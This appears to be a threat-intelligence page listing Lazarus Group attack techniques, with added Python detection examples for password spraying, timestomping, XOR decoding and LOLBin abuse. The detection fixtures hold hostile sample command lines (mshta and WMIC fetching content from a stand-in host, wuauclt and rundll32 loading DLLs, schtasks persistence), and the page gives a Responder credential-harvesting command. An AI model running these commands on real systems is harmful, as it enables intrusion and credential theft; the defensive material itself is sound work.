Campaigns
From Lazarus "No Pineapple"

Tags: Zinc, Hidden Cobra, Lazarus, Pineapple, APT38
The North Korean group Lazarus, tagged here as APT38, has been active since at least 2009. Its membership and size are unknown. Because of the intent, tradecraft and persistence of its operations, it is classified as an Advanced Persistent Threat. The security community also tracks it under names such as Zinc and Hidden Cobra.

Indicators of Compromise

No domains found for this campaign

APT Groups (1)

Lazarus Group (Korea, Democratic People's Republic of)
Associated names: Labyrinth Chollima, Hidden Cobra, Diamond Sleet, Group 77, Whois Hacking Team, APT-C-26, NewRomanic Cyber Army Team, UNC2970, UNC577, TraderTraitor, TA404, SectorA01, ATK 3, Gods Disciples, Appleworm, Guardians of Peace, UNC4736, DEV-0139, ITG03, Lazarus Group, UNC4034, Jade Sleet, Zinc, Hastati Group, UNC4899, Gods Apostles

Campaign Guidance

Remediation, mitigation, notes, history and related intelligence

Name | Description
Labyrinth Chollima | [4]
HIDDEN COBRA | The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.[1][5]
Guardians of Peace | [1]
ZINC | [6]
NICKEL ACADEMY | [7]

Domain | ID | Name | Use
Enterprise | T1134.002 | Access Token Manipulation: Create Process with Token

Lazarus Group keylogger KiloAlfa obtains user tokens from interactive sessions to execute itself with API call CreateProcessAsUserA under that user's context.[3][8]

Enterprise | T1087.002 | Account Discovery: Domain Account

Lazarus Group has queried an active directory server to obtain the list of accounts, including administrator accounts.[9]

Enterprise | T1098 | Account Manipulation

Lazarus Group malware WhiskeyDelta-Two contains a function that attempts to rename the administrator’s account.[3][10]

Enterprise | T1583.001 | Acquire Infrastructure: Domains

Lazarus Group has acquired domains related to their campaigns to act as distribution points and C2 channels.[11][9][12]

Enterprise | T1583.004 | Acquire Infrastructure: Server

Lazarus Group has acquired servers to host their malicious tools.[9]

Enterprise | T1583.006 | Acquire Infrastructure: Web Services

Lazarus Group has hosted malicious downloads on Github and Dropbox.[11][13]

Enterprise | T1557.001 | Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay

Lazarus Group executed Responder using the command [Responder file path] -i [IP address] -rPv on a compromised host to harvest credentials and move laterally.[14]

Enterprise | T1071.001 | Application Layer Protocol: Web Protocols

Lazarus Group has conducted C2 over HTTP and HTTPS.[15][16][17][18][19][20][21]

Enterprise | T1010 | Application Window Discovery

Lazarus Group malware IndiaIndia obtains and sends to its C2 server the title of the window for each running process. The KiloAlfa keylogger also reports the title of the foreground window.[3][22][8]

Enterprise | T1560 | Archive Collected Data

Lazarus Group has compressed exfiltrated data with RAR and used RomeoDelta malware to archive specified directories in .zip format, encrypt the .zip file, and upload it to C2.[22][23][15][9]

Enterprise | T1560.002 | Archive Collected Data: Archive via Library

Lazarus Group malware IndiaIndia saves information gathered about the victim to a file that is compressed with Zlib, encrypted, and uploaded to a C2 server.[23][15]

Enterprise | T1560.003 | Archive Collected Data: Archive via Custom Method

Lazarus Group malware sample encrypts data using a simple byte based XOR operation prior to exfiltration.[3][22][23][15]

Enterprise | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Lazarus Group has maintained persistence by loading malicious code into a startup folder or by adding a Registry Run key.[3][23][15][18][19]

Enterprise | T1547.009 | Boot or Logon Autostart Execution: Shortcut Modification

Lazarus Group malware has maintained persistence on a system by creating a LNK shortcut in the user’s Startup folder.[15][13]

Enterprise | T1110 | Brute Force

Lazarus Group has performed brute force attacks against administrator accounts.[9]

Enterprise | T1110.003 | Brute Force: Password Spraying

Lazarus Group malware attempts to connect to Windows shares for lateral movement by using a generated list of usernames, which center around permutations of the username Administrator, and weak passwords.[3][23]
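Detection logic for the spraying pattern just described (many account names, each tried once or twice, from one source), as an added example that is not part of the page and not any vendor's tooling. The events below are constructed for this example in the shape of Windows Security Event ID 4625 records; status 0xC000006D is the real "bad user name or password" code.

```python
"""Flag password spraying in constructed Windows 4625 logon-failure records."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: 10.0.0.5 walks Administrator permutations against a
# host within a minute; 10.0.0.9 is one user mistyping a password twice.
SAMPLE_EVENTS = [
    {"time": "2024-03-01T10:00:01", "src": "10.0.0.5", "user": "Administrator", "status": "0xC000006D"},
    {"time": "2024-03-01T10:00:02", "src": "10.0.0.5", "user": "administrator", "status": "0xC000006D"},
    {"time": "2024-03-01T10:00:03", "src": "10.0.0.5", "user": "Admin", "status": "0xC000006D"},
    {"time": "2024-03-01T10:00:04", "src": "10.0.0.5", "user": "Administrator1", "status": "0xC000006D"},
    {"time": "2024-03-01T10:00:05", "src": "10.0.0.5", "user": "Admin123", "status": "0xC000006D"},
    {"time": "2024-03-01T10:00:06", "src": "10.0.0.5", "user": "Administrateur", "status": "0xC000006D"},
    {"time": "2024-03-01T10:00:07", "src": "10.0.0.5", "user": "root", "status": "0xC000006D"},
    {"time": "2024-03-01T10:00:08", "src": "10.0.0.5", "user": "sysadmin", "status": "0xC000006D"},
    {"time": "2024-03-01T10:05:00", "src": "10.0.0.9", "user": "jsmith", "status": "0xC000006D"},
    {"time": "2024-03-01T10:05:30", "src": "10.0.0.9", "user": "jsmith", "status": "0xC000006D"},
]


def detect_spray(events, window=timedelta(minutes=5), min_users=5, max_per_user=3):
    """Return {source: sorted distinct usernames} for every source whose failures
    hit at least `min_users` distinct accounts inside `window`, with no single
    account failing more than `max_per_user` times. Many accounts with few tries
    each is a spray; many tries on one account is ordinary brute force."""
    by_src = defaultdict(list)
    for e in events:
        if e["status"] == "0xC000006D":
            # Windows account names are case-insensitive, so fold them first.
            by_src[e["src"]].append((datetime.fromisoformat(e["time"]), e["user"].lower()))
    hits = {}
    for src, fails in by_src.items():
        fails.sort()
        # Slide a time window across this source's failures, oldest first.
        for i in range(len(fails)):
            per_user = defaultdict(int)
            for t, user in fails[i:]:
                if t - fails[i][0] > window:
                    break
                per_user[user] += 1
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                hits[src] = sorted(per_user)
                break
    return hits


def admin_like(users):
    """Subset of account names built around 'admin', the permutation set the
    malware is reported to generate."""
    return [u for u in users if "admin" in u]
```

The window and thresholds are tuning knobs; a spray that targets shares rather than interactive logons still produces 4625 events with logon type 3, so the same grouping applies.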

Enterprise | T1059.001 | Command and Scripting Interpreter: PowerShell

Lazarus Group has used PowerShell to execute commands and malicious code.[9][12]

Enterprise | T1059.003 | Command and Scripting Interpreter: Windows Command Shell

Lazarus Group malware uses cmd.exe to execute commands on a compromised host.[3][10][15][24][20] A Destover-like variant used by Lazarus Group uses a batch file mechanism to delete its binaries from the system.[25]

Enterprise | T1059.005 | Command and Scripting Interpreter: Visual Basic

Lazarus Group has used VBA and embedded macros in Word documents to execute malicious code.[18][13][19][20]

Enterprise | T1584.001 | Compromise Infrastructure: Domains

Lazarus Group has compromised legitimate domains, including those hosted in the US and Italy, for C2.[26]

Enterprise | T1584.004 | Compromise Infrastructure: Server

Lazarus Group has compromised servers to stage malicious tools.[14][13][9][18]

Enterprise | T1543.003 | Create or Modify System Process: Windows Service

Several Lazarus Group malware families install themselves as new services.[3][10]

Enterprise | T1485 | Data Destruction

Lazarus Group has used a custom secure delete function to overwrite file contents with data from heap memory.[3]

Enterprise | T1132.001 | Data Encoding: Standard Encoding

Lazarus Group malware sample encodes data with base64.[15]

Enterprise | T1005 | Data from Local System

Lazarus Group has collected data and files from compromised networks.[3][22][23][14][13][18]

Enterprise | T1001.003 | Data Obfuscation: Protocol Impersonation

Lazarus Group malware also uses a unique form of communication encryption known as FakeTLS that mimics TLS but uses a different encryption method, potentially evading SSL traffic inspection/decryption.[3][10][15][25]

Enterprise | T1074.001 | Data Staged: Local Data Staging

Lazarus Group malware IndiaIndia saves information gathered about the victim to a file that is saved in the %TEMP% directory, then compressed, encrypted, and uploaded to a C2 server.[3][22]

Enterprise | T1491.001 | Defacement: Internal Defacement

Lazarus Group replaced the background wallpaper of systems with a threatening image after rendering the system unbootable with a Disk Structure Wipe.[10]

Enterprise | T1140 | Deobfuscate/Decode Files or Information

Lazarus Group has used shellcode within macros to decrypt and manually map DLLs and shellcode into memory at runtime.[19][20]

Enterprise | T1587.001 | Develop Capabilities: Malware

Lazarus Group has developed custom malware for use in their operations.[11][9][12][13]

Enterprise | T1561.001 | Disk Wipe: Disk Content Wipe

Lazarus Group has used malware like WhiskeyAlfa to overwrite the first 64MB of every drive with a mix of static and random buffers. A similar process is then used to wipe content in logical drives and, finally, attempt to wipe every byte of every sector on every drive. WhiskeyBravo can be used to overwrite the first 4.9MB of physical drives. WhiskeyDelta can overwrite the first 132MB or 1.5MB of each drive with random data from heap memory.[10]

Enterprise | T1561.002 | Disk Wipe: Disk Structure Wipe

Lazarus Group malware SHARPKNOT overwrites and deletes the Master Boot Record (MBR) on the victim's machine; the group has possessed MBR wiper malware since at least 2009.[24][3]

Enterprise | T1189 | Drive-by Compromise

Lazarus Group delivered RATANKBA and other malicious code to victims via a compromised legitimate website.[27][12]

Enterprise | T1573.001 | Encrypted Channel: Symmetric Cryptography

Several Lazarus Group malware families encrypt C2 traffic using custom code that uses XOR with an ADD operation and XOR with a SUB operation. Another Lazarus Group malware sample XORs C2 traffic. Other Lazarus Group malware uses Caracachs encryption to encrypt C2 payloads. Lazarus Group has also used AES to encrypt C2 traffic.[3][10][15][25][18]

Enterprise | T1585.001 | Establish Accounts: Social Media Accounts

Lazarus Group has created new LinkedIn and Twitter accounts to conduct social engineering against potential victims.[13][9][12]

Enterprise | T1585.002 | Establish Accounts: Email Accounts

Lazarus Group has created new email accounts for spearphishing operations.[9][14]

Enterprise | T1048.003 | Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol

Lazarus Group malware SierraBravo-Two generates an email message via SMTP containing information about newly infected victims.[3][23]

Enterprise | T1041 | Exfiltration Over C2 Channel

Lazarus Group has exfiltrated data and files over a C2 channel through its various tools and malware.[3][22][15][26]

Enterprise | T1567.002 | Exfiltration Over Web Service: Exfiltration to Cloud Storage

Lazarus Group has exfiltrated stolen data to Dropbox using a customized version of dbxcli.[9][13]

Enterprise | T1203 | Exploitation for Client Execution

Lazarus Group has exploited Adobe Flash vulnerability CVE-2018-4878 for execution.[28]

Enterprise | T1008 | Fallback Channels

Lazarus Group malware SierraAlfa sends data to one of the hard-coded C2 servers chosen at random, and if the transmission fails, chooses a new C2 server to attempt the transmission again.[3][23]

Enterprise | T1083 | File and Directory Discovery

Lazarus Group has conducted keyword searches on compromised machines to identify specific documents of interest. Lazarus Group malware can use a common function to identify target files by their extension, and some samples also enumerate files and directories, including a Destover-like variant that lists files and gathers information for all drives.[3][25][13][19][20]

Enterprise | T1589.002 | Gather Victim Identity Information: Email Addresses

Lazarus Group collected email addresses belonging to various departments of a targeted organization which were used in follow-on phishing campaigns.[14]

Enterprise | T1591 | Gather Victim Org Information

Lazarus Group has studied publicly available information about a targeted organization to tailor spearphishing efforts against specific departments and/or individuals.[9][13][14]

Enterprise | T1591.004 | Gather Victim Org Information: Identify Roles

Lazarus Group has targeted specific individuals within an organization with tailored job vacancy announcements.[9][13]

Enterprise | T1564.001 | Hide Artifacts: Hidden Files and Directories

Lazarus Group has used a VBA Macro to set its file attributes to System and Hidden and has named files with a dot prefix to hide them from the Finder application.[15][16][17][19]

Enterprise | T1574.002 | Hijack Execution Flow: DLL Side-Loading

Lazarus Group has replaced win_fw.dll, an internal component that is executed during IDA Pro installation, with a malicious DLL to download and execute a payload.[21]

Enterprise | T1574.013 | Hijack Execution Flow: KernelCallbackTable

Lazarus Group has abused the KernelCallbackTable to hijack process control flow and execute shellcode.[19][20]

Enterprise | T1562.001 | Impair Defenses: Disable or Modify Tools

Lazarus Group malware TangoDelta attempts to terminate various processes associated with McAfee. Additionally, Lazarus Group malware SHARPKNOT disables the Microsoft Windows System Event Notification and Alerter services.[3][22][8][24]

Enterprise | T1562.004 | Impair Defenses: Disable or Modify System Firewall

Various Lazarus Group malware modifies the Windows firewall to allow incoming connections, or disables it entirely, using netsh.[3][22][8]

Enterprise | T1070 | Indicator Removal

Lazarus Group has restored malicious KernelCallbackTable code to its original state after the process execution flow has been hijacked.[19]

Enterprise | T1070.003 | Indicator Removal: Clear Command History

Lazarus Group has routinely deleted log files on a compromised router, including automatic log deletion through the use of the logrotate utility.[14]

Enterprise | T1070.004 | Indicator Removal: File Deletion

Lazarus Group malware has deleted files in various ways, including "suicide scripts" to delete malware binaries from the victim. Lazarus Group also uses secure file deletion to delete files from the victim.[3][25]

Enterprise | T1070.006 | Indicator Removal: Timestomp

Several Lazarus Group malware families use timestomping, including modifying the last write timestamp of a specified Registry key to a random date, as well as copying the timestamp for legitimate .exe files (such as calc.exe or mspaint.exe) to its dropped files.[3][10][22][25]
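A check for the second timestomping variant above (a dropped file given the exact modification time of a legitimate binary such as calc.exe or mspaint.exe), as an added example that is not part of the page. The directory layout is constructed in a temporary folder so the demo runs anywhere; on a Windows host you would point `reference_mtimes()` at C:\Windows\System32 and `find_timestamp_clones()` at the Startup folder and %TEMP%.

```python
"""Find files whose mtime is a copy of a system binary's mtime."""
import os
import tempfile
from pathlib import Path


def reference_mtimes(ref_dir):
    """Map mtime (nanoseconds) -> file name for every regular file in ref_dir."""
    return {p.stat().st_mtime_ns: p.name for p in Path(ref_dir).iterdir() if p.is_file()}


def find_timestamp_clones(scan_dir, refs):
    """Return [(path, reference_name)] for files under scan_dir whose mtime equals
    a reference binary's mtime to the nanosecond. Two unrelated files matching
    that closely by chance is practically impossible, so a hit is either a
    copied timestamp or the same installer having written both files."""
    hits = []
    for p in Path(scan_dir).rglob("*"):
        if p.is_file() and p.stat().st_mtime_ns in refs:
            hits.append((str(p), refs[p.stat().st_mtime_ns]))
    return hits


def demo():
    """Constructed layout: a fake System32 with two binaries stamped with old
    install dates, and a Startup folder holding one dropper whose mtime was
    copied from calc.exe plus one file with a genuine current mtime."""
    root = Path(tempfile.mkdtemp())
    sys32, startup = root / "System32", root / "Startup"
    sys32.mkdir()
    startup.mkdir()
    day = 86_400 * 10**9
    calc_time = 1_262_304_000 * 10**9  # 2010-01-01T00:00:00Z, as nanoseconds
    for name, t in (("calc.exe", calc_time), ("mspaint.exe", calc_time + day)):
        (sys32 / name).write_bytes(b"MZ")
        os.utime(sys32 / name, ns=(t, t))
    dropper = startup / "updater.lnk"
    dropper.write_bytes(b"L\x00\x00\x00")
    os.utime(dropper, ns=(calc_time, calc_time))  # the timestomp itself
    (startup / "notes.txt").write_text("fresh")   # untouched, written just now
    return find_timestamp_clones(startup, reference_mtimes(sys32))
```

This catches only exact copies. On NTFS the stronger check is to compare the $STANDARD_INFORMATION timestamps (which SetFileTime can change) against $FILE_NAME (which it cannot), since a copied timestamp leaves the two attributes disagreeing.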

Enterprise | T1202 | Indirect Command Execution

Lazarus Group persistence mechanisms have used forfiles.exe to execute .htm files.[20]

Enterprise | T1105 | Ingress Tool Transfer

Lazarus Group has downloaded files, malware, and tools from its C2 onto a compromised host.[3][10][22][16][17][13][14][18][9][12][19][20][21]

Enterprise | T1056.001 | Input Capture: Keylogging

Lazarus Group malware KiloAlfa contains keylogging functionality.[3][8]

Enterprise | T1534 | Internal Spearphishing

Lazarus Group has conducted internal spearphishing from within a compromised organization.[13]

Enterprise | T1036 | Masquerading

Lazarus Group has disguised malicious template files as JPEG files to avoid detection.[18]

Enterprise | T1036.003 | Masquerading: Rename System Utilities

Lazarus Group has renamed system utilities such as wscript.exe and mshta.exe.[20]

Enterprise | T1036.004 | Masquerading: Masquerade Task or Service

Lazarus Group has used a scheduled task named SRCheck to mask the execution of a malicious .dll.[21]

Enterprise | T1036.005 | Masquerading: Match Legitimate Name or Location

Lazarus Group has renamed malicious code to disguise it as Microsoft's narrator and other legitimate files.[29][9][20]

Enterprise | T1104 | Multi-Stage Channels

Lazarus Group has used multi-stage malware components that inject later stages into separate processes.[19]

Enterprise | T1106 | Native API

Lazarus Group has used the Windows API ObtainUserAgentString to obtain the User-Agent from a compromised host to connect to a C2 server.[18] Lazarus Group has also used various, often lesser known, functions to perform various types of Discovery and Process Injection.[19][20]

Enterprise | T1046 | Network Service Discovery

Lazarus Group has used nmap from a router VM to scan ports on systems within the restricted segment of an enterprise network.[14]

Enterprise | T1571 | Non-Standard Port

Some Lazarus Group malware uses a list of ordered port numbers to choose a port for C2 traffic, creating port-protocol mismatches.[3][23]

Enterprise | T1027 | Obfuscated Files or Information

Lazarus Group has used multiple types of encryption and encoding for their payloads, including AES, Caracachs, RC4, XOR, Base64, and other tricks such as creating aliases in code for Native API function names.[3][22][23][15][17][9][18][26][13][19][20]
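The single-byte XOR named here, and in the Archive via Custom Method entry above, is the weakest layer in that list and the one an analyst peels off first. The following added example (not part of the page, not any vendor's tool) recovers the key by known-plaintext scanning: decode under all 255 non-trivial keys and look for strings a Windows payload must contain. The encoded sample is constructed here; the MZ signature and the DOS stub message are real PE-header constants, and PK 03 04 is the ZIP local-file-header magic, which covers the .zip archives mentioned earlier.

```python
"""Recover a single-byte XOR key from an encoded payload by crib scanning."""

DOS_STUB = b"This program cannot be run in DOS mode"
# Strings an analyst expects inside a decoded Windows executable or archive.
KNOWN_PLAINTEXTS = [b"MZ", DOS_STUB, b"PK\x03\x04"]


def xor_bytes(data, key):
    """XOR every byte with one key byte; the operation is its own inverse."""
    return bytes(b ^ key for b in data)


def recover_single_byte_key(blob, crib=DOS_STUB):
    """Try every key 1..255 and return the first under which `crib` appears, else
    None. Key 0 is skipped on purpose: a blob that already contains the crib is
    not encoded at all, and reporting key 0 would hide that."""
    for key in range(1, 256):
        if crib in xor_bytes(blob, key):
            return key
    return None


def score_candidates(blob):
    """Rank keys by how many known plaintexts appear after decoding, for blobs
    where the right crib is unknown (an archive rather than a PE, for instance).
    Returns [(key, score)] sorted best first; only keys with a hit are listed."""
    scores = {}
    for key in range(1, 256):
        decoded = xor_bytes(blob, key)
        hits = sum(decoded.count(p) for p in KNOWN_PLAINTEXTS)
        if hits:
            scores[key] = hits
    return sorted(scores.items(), key=lambda kv: -kv[1])


# Constructed sample: a minimal PE-like header XORed with 0x5A, the way a
# dropper might carry its second stage before writing it to %TEMP%.
SAMPLE_PLAINTEXT = (b"MZ" + b"\x90" * 62 + DOS_STUB + b"\r\n$"
                    + b"\x00" * 16 + b"PE\x00\x00")
SAMPLE_BLOB = xor_bytes(SAMPLE_PLAINTEXT, 0x5A)
```

For a repeating multi-byte key the same idea works per key position: split the blob into one stream per position and apply the scan to each, using the most common byte (0x00 in PE padding) as the crib when the text strings fall across stream boundaries.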

Enterprise | T1027.002 | Obfuscated Files or Information: Software Packing

Lazarus Group has used Themida to pack malicious DLLs and other files.[13][26]

Enterprise | T1027.007 | Obfuscated Files or Information: Dynamic API Resolution

Lazarus Group has used a custom hashing method to resolve APIs used in shellcode.[19]

Enterprise | T1588.002 | Obtain Capabilities: Tool

Lazarus Group has obtained a variety of tools for their operations, including Responder, PuTTY PSCP, Wake-On-Lan, ChromePass, and dbxcli.[9][13][14]

Enterprise | T1588.003 | Obtain Capabilities: Code Signing Certificates

Lazarus Group has used code signing certificates issued by Sectigo RSA for some of its malware and tools.[9]

Enterprise | T1588.004 | Obtain Capabilities: Digital Certificates

Lazarus Group has obtained SSL certificates for their C2 domains.[11]

Enterprise | T1566.001 | Phishing: Spearphishing Attachment

Lazarus Group has targeted victims with spearphishing emails containing malicious Microsoft Word documents.[28][14][18][19][20]

Enterprise | T1566.002 | Phishing: Spearphishing Link

Lazarus Group has sent malicious links to victims via email.[14][13][9]

Enterprise | T1566.003 | Phishing: Spearphishing via Service

Lazarus Group has used social media platforms, including LinkedIn and Twitter, to send spearphishing messages.[12][13][9]

Enterprise | T1542.003 | Pre-OS Boot: Bootkit

Lazarus Group malware WhiskeyAlfa-Three modifies sector 0 of the Master Boot Record (MBR) to ensure that the malware will persist even if a victim machine shuts down.[3][10]

Enterprise | T1057 | Process Discovery

Several Lazarus Group malware families gather a list of running processes on a victim system and send it to their C2 server. A Destover-like variant used by Lazarus Group also gathers process times.[3][22][15][25][17][19]

Enterprise | T1055.001 | Process Injection: Dynamic-link Library Injection

Lazarus Group malware sample performs reflective DLL injection.[15][19]

Enterprise | T1090.001 | Proxy: Internal Proxy

Lazarus Group has used a compromised router to serve as a proxy between a victim network's corporate and restricted segments.[14]

Enterprise | T1090.002 | Proxy: External Proxy

Lazarus Group has used multiple proxies to obfuscate network traffic from victims.[30][17]

Enterprise | T1012 | Query Registry

Lazarus Group malware IndiaIndia checks Registry keys within HKCU and HKLM to determine if certain applications are present, including SecureCRT, Terminal Services, RealVNC, TightVNC, UltraVNC, Radmin, mRemote, TeamViewer, FileZilla, pcAnywhere, and Remote Desktop. Another Lazarus Group malware sample checks for the presence of the following Registry key: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt.[3][22][15]

Enterprise | T1620 | Reflective Code Loading

Lazarus Group has changed memory protection permissions then overwritten in memory DLL function code with shellcode, which was later executed via KernelCallbackTable hijacking. Lazarus Group has also used shellcode within macros to decrypt and manually map DLLs into memory at runtime.[19][20]

Enterprise | T1021.001 | Remote Services: Remote Desktop Protocol

Lazarus Group malware SierraCharlie uses RDP for propagation.[3][23]

Enterprise | T1021.002 | Remote Services: SMB/Windows Admin Shares

Lazarus Group malware SierraAlfa accesses the ADMIN$ share via SMB to conduct lateral movement.[3][23]

Enterprise | T1021.004 | Remote Services: SSH

Lazarus Group used SSH and the PuTTY PSCP utility to gain access to a restricted segment of a compromised network.[14]

Enterprise | T1053.005 | Scheduled Task/Job: Scheduled Task

Lazarus Group has used schtasks for persistence including through the periodic execution of a remote XSL script or a dropped VBS payload.[9][20][21]

Enterprise | T1593.001 | Search Open Websites/Domains: Social Media

Lazarus Group has used LinkedIn to identify and target specific employees within a chosen organization.[9][13]

Enterprise | T1489 | Service Stop

Lazarus Group has stopped the MSExchangeIS service to render Exchange contents inaccessible to users.[10]

Enterprise | T1608.001 | Stage Capabilities: Upload Malware

Lazarus Group has hosted malicious files on compromised as well as Lazarus Group-controlled servers.[13][9][26]

Enterprise | T1608.002 | Stage Capabilities: Upload Tool

Lazarus Group has hosted custom and open-source tools on compromised as well as Lazarus Group-controlled servers.[9]

Enterprise | T1553.002 | Subvert Trust Controls: Code Signing

Lazarus Group has digitally signed malware and utilities to evade detection.[9][19]

Enterprise | T1218 | System Binary Proxy Execution

Lazarus Group lnk files used for persistence have abused the Windows Update Client (wuauclt.exe) to execute a malicious DLL.[19][20]

Enterprise | T1218.005 | System Binary Proxy Execution: Mshta

Lazarus Group has used mshta.exe to execute HTML pages downloaded by initial access documents.[19][20]

Enterprise | T1218.010 | System Binary Proxy Execution: Regsvr32

Lazarus Group has used regsvr32 to execute custom malware.[9]

Enterprise | T1218.011 | System Binary Proxy Execution: Rundll32

Lazarus Group has used rundll32 to execute malicious payloads on a compromised host.[18][9][21]

Enterprise | T1082 | System Information Discovery

Several Lazarus Group malware families collect information on the type and version of the victim OS, as well as the victim computer name and CPU information. A Destover-like variant used by Lazarus Group also collects disk space information and sends it to its C2 server.[3][10][22][15][25][19]

Enterprise | T1614.001 | System Location Discovery: System Language Discovery

Lazarus Group has deployed malware designed not to run on computers set to Korean, Japanese, or Chinese in Windows language preferences.[13]

Enterprise | T1016 | System Network Configuration Discovery

Lazarus Group malware IndiaIndia obtains and sends to its C2 server information about the first network interface card’s configuration, including IP address, gateways, subnet mask, DHCP information, and whether WINS is available.[3][22]

Enterprise | T1049 | System Network Connections Discovery

Lazarus Group has used net use to identify and establish a network connection with a remote host.[14]

Enterprise | T1033 | System Owner/User Discovery

Various Lazarus Group malware enumerates logged-on users.[3][10][22][23][15][16][19]

Enterprise | T1529 | System Shutdown/Reboot

Lazarus Group has rebooted systems after destroying files and wiping the MBR on infected systems.[24]

Enterprise | T1124 | System Time Discovery

A Destover-like implant used by Lazarus Group can obtain the current system time and send it to the C2 server.[25]

Enterprise | T1221 | Template Injection

Lazarus Group has used DOCX files to retrieve a malicious document template/DOTM file.[13][18]

Enterprise | T1204.001 | User Execution: Malicious Link

Lazarus Group has sent spearphishing emails in an attempt to lure users to click on a malicious link.[9][13]

Enterprise | T1204.002 | User Execution: Malicious File

Lazarus Group has attempted to get users to launch a malicious Microsoft Word attachment delivered via a spearphishing email.[28][13][14][19][20]

Enterprise | T1078 | Valid Accounts

Lazarus Group has used administrator credentials to gain access to restricted network segments.[14]

Enterprise | T1497.001 | Virtualization/Sandbox Evasion: System Checks

Lazarus Group has used tools to detect sandbox or VMware services through identifying the presence of a debugger or related services.[13]

Enterprise | T1102.002 | Web Service: Bidirectional Communication

Lazarus Group has used GitHub as C2, pulling hosted image payloads then committing command execution output to files in specific directories.[19]

Enterprise | T1047 | Windows Management Instrumentation

Lazarus Group has used WMIC for discovery as well as to execute payloads for persistence and lateral movement.[3][23][13][14][20]

Enterprise | T1220 | XSL Script Processing

Lazarus Group has used WMIC to execute a remote XSL script to establish persistence.[9]
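The living-off-the-land entries above (netsh firewall changes, renamed wscript.exe/mshta.exe, forfiles.exe, schtasks persistence, wuauclt.exe loading a DLL, mshta.exe running downloaded HTML, regsvr32/rundll32 payload loading, and WMIC rendering a remote XSL) all leave their fingerprint in the process-creation command line. The triage below is an added example, not part of the page and not a vendor rule set. Records are constructed here in a Sysmon Event ID 1 shape; the rules key on the PE OriginalFileName rather than the on-disk name so renamed copies still match. The wuauclt command-line form is the documented LOLBin invocation and is an assumption here, since the page only states that a DLL was loaded; example.invalid is a reserved name.

```python
"""Triage constructed process-creation records for LOLBin abuse patterns."""
import ntpath
import re

# Utilities whose OriginalFileName should match the name they run under.
PROXY_UTILS = {"wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe", "wmic.exe"}
# Paths an unprivileged user can write to; a system binary loading from here is suspect.
USER_WRITABLE = re.compile(r"\\(users\\[^\\]+\\appdata|programdata|windows\\temp|temp)\\", re.I)


def triage(event):
    """Return [(technique_id, reason)] for one process-creation record."""
    exe = ntpath.basename(event["Image"]).lower()
    cmd = event["CommandLine"].lower()
    orig = event.get("OriginalFileName", "").lower()
    hits = []
    if orig in PROXY_UTILS and exe != orig:
        hits.append(("T1036.003", f"{exe} is really {orig}"))
    if orig == "netsh.exe" and "firewall" in cmd and re.search(r"add\s+rule|state\s+off|set\s+opmode", cmd):
        hits.append(("T1562.004", "firewall rule added or firewall disabled"))
    if orig == "wmic.exe" and re.search(r'/format:\s*"?https?://', cmd):
        hits.append(("T1220", "WMIC rendering a remote XSL stylesheet"))
    if orig == "wuauclt.exe" and "/updatedeploymentprovider" in cmd and "/runhandlercomserver" in cmd:
        hits.append(("T1218", "Windows Update client told to load an arbitrary DLL"))
    if orig == "mshta.exe" and re.search(r"https?://|\.hta\b|\.htm", cmd):
        hits.append(("T1218.005", "mshta executing HTML/HTA content"))
    if orig in {"regsvr32.exe", "rundll32.exe"} and USER_WRITABLE.search(cmd):
        sub = "010" if orig == "regsvr32.exe" else "011"
        hits.append((f"T1218.{sub}", "loading a module from a user-writable path"))
    if orig == "forfiles.exe" and "/c" in cmd:
        hits.append(("T1202", "forfiles used to launch another command"))
    if orig == "schtasks.exe" and "/create" in cmd:
        hits.append(("T1053.005", "scheduled task created"))
    return hits


def triage_all(events):
    """Map record index -> findings, for records with at least one finding."""
    return {i: triage(e) for i, e in enumerate(events) if triage(e)}


# Constructed sample records; the last one is benign and must not be flagged.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\netsh.exe", "OriginalFileName": "netsh.exe",
     "CommandLine": r'netsh advfirewall firewall add rule name="Update" dir=in action=allow program="C:\ProgramData\svc.exe"'},
    {"Image": r"C:\ProgramData\wininit.exe", "OriginalFileName": "mshta.exe",
     "CommandLine": r"wininit.exe https://example.invalid/page.htm"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe", "OriginalFileName": "wmic.exe",
     "CommandLine": r'wmic os get /format:"https://example.invalid/style.xsl"'},
    {"Image": r"C:\Windows\System32\wuauclt.exe", "OriginalFileName": "wuauclt.exe",
     "CommandLine": r"wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\up.dll /RunHandlerComServer"},
    {"Image": r"C:\Windows\System32\rundll32.exe", "OriginalFileName": "rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\bob\AppData\Local\Temp\x.dll,Start"},
    {"Image": r"C:\Windows\System32\forfiles.exe", "OriginalFileName": "forfiles.exe",
     "CommandLine": r"forfiles /p C:\Windows /m notepad.exe /c C:\ProgramData\a.htm"},
    {"Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "CommandLine": r'schtasks /create /sc minute /mo 5 /tn SRCheck /tr "rundll32 C:\ProgramData\m.dll,Run"'},
    {"Image": r"C:\Windows\System32\svchost.exe", "OriginalFileName": "svchost.exe",
     "CommandLine": r"svchost.exe -k netsvcs"},
]
```

Keying on OriginalFileName is what makes the rename rule work: a copy of mshta.exe saved as wininit.exe still carries mshta.exe in its version resource, and Sysmon records that field. Command-line matching alone would miss it.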

ICS | T0865 | Spearphishing Attachment

Lazarus Group has been observed targeting organizations using spearphishing documents with embedded malicious payloads.[31] Highly targeted spearphishing campaigns have been conducted against a U.S. electric grid company.[32]

ID | Name | References | Techniques
